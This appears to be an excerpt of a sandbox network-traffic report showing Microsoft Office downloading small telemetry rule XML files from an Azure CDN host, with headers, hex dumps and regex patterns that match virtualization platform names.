                                                2024-10-29 23:22:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.45811613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:57 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:57 GMT
                                                Content-Type: text/xml
                                                Content-Length: 468
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                ETag: "0x8DC582BB3EAF226"
                                                x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232257Z-16849878b78sx229w7g7at4nkg00000005cg00000000pm0q
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.45811713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 485
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                ETag: "0x8DC582BB9769355"
                                                x-ms-request-id: 73e55707-201e-006e-2b80-29bbe3000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-r197bdfb6b46kdskt78qagqq1c00000007g00000000068zh
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.45811813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:57 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 411
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                ETag: "0x8DC582B989AF051"
                                                x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-16849878b78p8hrf1se7fucxk8000000083000000000bfas
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.45811913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:58 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 470
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                ETag: "0x8DC582BBB181F65"
                                                x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-16849878b78tg5n42kspfr0x48000000076000000000k7mu
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.45812113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:58 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 502
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                ETag: "0x8DC582BB6A0D312"
                                                x-ms-request-id: f4a85f8f-401e-00ac-0701-270a97000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-16849878b78g2m84h2v9sta290000000064000000000d32s
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.45812013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:58 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 427
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                ETag: "0x8DC582BB556A907"
                                                x-ms-request-id: c1144745-701e-0098-7f2c-26395f000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-r197bdfb6b48pcqqxhenwd2uz8000000086g000000000fhk
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.45812313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:58 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 474
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                ETag: "0x8DC582BB3F48DAE"
                                                x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-16849878b78j7llf5vkyvvcehs000000085g00000000xzun
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.45812213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:58 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:58 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:58 GMT
                                                Content-Type: text/xml
                                                Content-Length: 407
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                ETag: "0x8DC582B9D30478D"
                                                x-ms-request-id: 9cbc4178-801e-008f-12a3-262c5d000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232258Z-16849878b78wv88bk51myq5vxc00000007c000000000xwqs
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:58 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.45812413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:59 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:59 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:59 GMT
                                                Content-Type: text/xml
                                                Content-Length: 408
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                ETag: "0x8DC582BB9B6040B"
                                                x-ms-request-id: 4814b401-401e-005b-1e73-279c0c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232259Z-r197bdfb6b4g24ztpxkw4umce800000008ug0000000060x8
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:59 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.45812613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:59 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:59 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:59 GMT
                                                Content-Type: text/xml
                                                Content-Length: 416
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                ETag: "0x8DC582BB5284CCE"
                                                x-ms-request-id: d9732123-901e-007b-1098-25ac50000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232259Z-16849878b78bcpfn2qf7sm6hsn00000008s000000000r97a
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:59 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.45812513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:59 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:59 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:59 GMT
                                                Content-Type: text/xml
                                                Content-Length: 469
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                ETag: "0x8DC582BB3CAEBB8"
                                                x-ms-request-id: 1d33856d-201e-000c-0612-2979c4000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232259Z-r197bdfb6b4qbfppwgs4nqza8000000005u000000000aykk
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
